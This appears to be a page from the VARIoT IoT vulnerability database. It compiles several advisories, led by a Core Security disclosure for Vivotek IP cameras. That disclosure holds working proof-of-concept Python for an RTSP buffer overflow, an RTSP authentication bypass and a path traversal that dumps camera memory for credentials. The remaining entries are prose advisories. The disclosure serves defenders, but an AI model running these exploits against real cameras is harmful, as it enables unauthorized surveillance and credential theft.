VARIoT IoT vulnerabilities database
| VAR-202001-0835 | CVE-2013-1595 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A Buffer Overflow vulnerability exists in Vivotek PT7135 IP Camera 0300a and 0400a via a specially crafted packet in the Authorization header field sent to the RTSP service, which could let a remote malicious user execute arbitrary code or cause a Denial of Service. Vivotek PT7135 IP Camera Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS.
Attackers can exploit this issue to execute arbitrary code in the context of the affected device. Failed attacks will cause denial-of-service conditions.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201207-0605 | No CVE | Hitachi JP1 Unknown Privilege Elevation Vulnerability in Multiple Products |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi JP1 has security vulnerabilities in multiple products that allow malicious local users to elevate privileges. The problem exists in the security program management program, and no detailed vulnerability details are currently provided.
Local attackers can exploit this issue to gain escalated privileges. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Hitachi JP1 Products Unspecified Privilege Escalation Vulnerability
SECUNIA ADVISORY ID:
SA49907
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49907/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49907
RELEASE DATE:
2012-07-13
DISCUSS ADVISORY:
http://secunia.com/advisories/49907/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49907/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49907
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Hitachi JP1 products,
which can be exploited by malicious, local users to gain escalated
privileges.
The vulnerability is caused due to an unspecified error within the
setup package manager. No further details are currently available.
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Apply patches (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Hitachi (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/./vuls/HS12-020/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0105 | CVE-2012-4028 | Tridium Niagara AX Framework Security Bypass Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Tridium Niagara AX Framework does not properly store credential data, which allows context-dependent attackers to bypass intended access restrictions by using the stored information for authentication. A vulnerability exists in the Tridium Niagara AX Framework. The vulnerability stems from a failure to properly store credential data. TRIDIUM NiagaraAX is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. ----------------------------------------------------------------------
The new Secunia CSI 6.0 is now available in beta!
Seamless integration with your existing security solutions Sign-up to
become a Beta tester: http://secunia.com/csi6beta
----------------------------------------------------------------------
TITLE:
Niagara Framework Predictable Session Identifier Vulnerability
SECUNIA ADVISORY ID:
SA50288
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50288/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50288
RELEASE DATE:
2012-08-16
DISCUSS ADVISORY:
http://secunia.com/advisories/50288/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50288/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50288
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Niagara Framework, which can be
exploited by malicious people to hijack a user's session.
The vulnerability is caused due to predictable sessions identifiers
being used.
SOLUTION:
No official solution is currently available.
PROVIDED AND/OR DISCOVERED BY:
Billy Rios and Terry McCorkle via ICS-CERT.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-228-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0054 | CVE-2012-2607 | Johnson Controls Multiple Products Remote Command Execution Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The Johnson Controls CK721-A controller with firmware before SSM4388_03.1.0.14_BB allows remote attackers to perform arbitrary actions via crafted packets to TCP port 41014 (aka the download port). Johnson Controls CK721-A and P2000 products contain a remote command execution vulnerability which may allow an unauthenticated remote attacker to perform various tasks against the devices. Johnson Controls is a well-known self-control manufacturer in the United States. An unauthenticated attacker can send a specially crafted message to this port to close the door and change the configuration. The \"upload\" port (tcp/41013) of the P2000 (Pegasys) server is used for logging and alarm purposes. The server only receives any message sent to it by verifying the source IP. The attacker can send a specially crafted message to the port to provide false information. Access data to the server.
Successfully exploiting this issue may allow an attacker to execute arbitrary commands within the context of the vulnerable system
| VAR-201207-0104 | CVE-2012-4027 | Tridium Niagara AX Framework Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Tridium Niagara AX Framework allows remote attackers to read files outside of the intended images, nav, and px folders by leveraging incorrect permissions, as demonstrated by reading the config.bog file. The Niagara Framework is a unified, open, distributed platform that integrates the management of a wide variety of devices and systems. The Niagara Framework has an input validation vulnerability that allows an attacker to exploit a vulnerability for a directory traversal attack. The vulnerability is due to the fact that some of the unspecified input is missing validation before being used to read the file, and any file content can be obtained by submitting a malicious request. TRIDIUM NiagaraAX is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Niagara Framework Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA49903
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49903/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49903
RELEASE DATE:
2012-07-16
DISCUSS ADVISORY:
http://secunia.com/advisories/49903/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49903/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49903
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Niagara Framework, which can be
exploited by malicious people to disclose system information. This can be exploited to disclose the contents of
arbitrary files via directory traversal sequences.
SOLUTION:
The vendor recommends to limit access to the affected systems.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Billy Rios and Terry McCorkle via ICS-CERT.
ORIGINAL ADVISORY:
https://www.tridium.com/galleries/briefings/NiagaraAX_Framework_Software_Security_Alert.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0176 | CVE-2012-3075 | Cisco TelePresence Immersive An arbitrary command execution vulnerability in endpoint devices |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Immersive Endpoint Devices before 1.7.4 allows remote authenticated users to execute arbitrary commands via a malformed request on TCP port 443, aka Bug ID CSCtn99724. Cisco TelePresence Immersive Endpoint is a video telepresence system. Also known as Bug ID CSCtn99724. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Cisco TelePresence Immersive Endpoint Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA49879
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49879/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49879/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49879/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco TelePresence
Immersive Endpoint devices, which can be exploited by malicious users
and malicious people to compromise a vulnerable system.
2) An error exists within the handling of Cisco Discovery Protocol
(CDP) packets.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-cts
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0336 | CVE-2012-2282 | EMC Celerra Network Server , EMC VNX ,and EMC VNXe Vulnerable to reading files |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
EMC Celerra Network Server 6.x before 6.0.61.0, VNX 7.x before 7.0.53.2, and VNXe 2.0 and 2.1 before 2.1.3.19077 (aka MR1 SP3.2) and 2.2 before 2.2.0.19078 (aka MR2 SP0.2) do not properly implement NFS access control, which allows remote authenticated users to read or modify files via a (1) NFSv2, (2) NFSv3, or (3) NFSv4 request. There are security vulnerabilities in multiple EMC products. Failure to properly access control settings allows an attacker to exploit the vulnerability to bypass security restrictions and gain unauthorized access to the output file system. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ESA-2012-027: EMC Celerra/VNX/VNXe Improper Access Control Vulnerability
EMC Identifier: ESA-2012-027
CVE Identifier: CVE-2012-2282
Severity Rating: CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Affected products:
EMC Celerra Network Server versions 6.0.36.4 through 6.0.60.2
EMC VNX versions 7.0.12.0 through 7.0.53.1
EMC VNXe 2.0 (including SP1, SP2, and SP3)
EMC VNXe MR1 (including SP1, SP2, SP3, and SP3.1)
EMC VNXe MR2 (including SP0.1)
Vulnerability Summary:
A vulnerability exists in EMC Celerra/VNX/VNXe systems that can be potentially exploited to gain unauthorized access to distributed files and directories.
For EMC Celerra, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads C > Celerra Software
For EMC VNX, navigate in Powerlink to Home >Support>Support by Product and search for VNX
For EMC VNXe, Log onto the affected VNXe, navigate in Support Zone as follows: Settings > More Configuration > Update Software > Obtain Candidate Version Online
Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.
For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
EMC Product Security Response Center
Security_Alert@emc.com
http://www.emc.com/contact-us/contact/product-security-response-center.htm
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (Cygwin)
